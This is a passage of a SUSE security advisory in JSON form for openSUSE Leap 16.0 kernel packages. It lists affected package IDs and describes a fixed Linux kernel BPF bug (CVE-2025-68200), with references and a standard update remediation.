"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
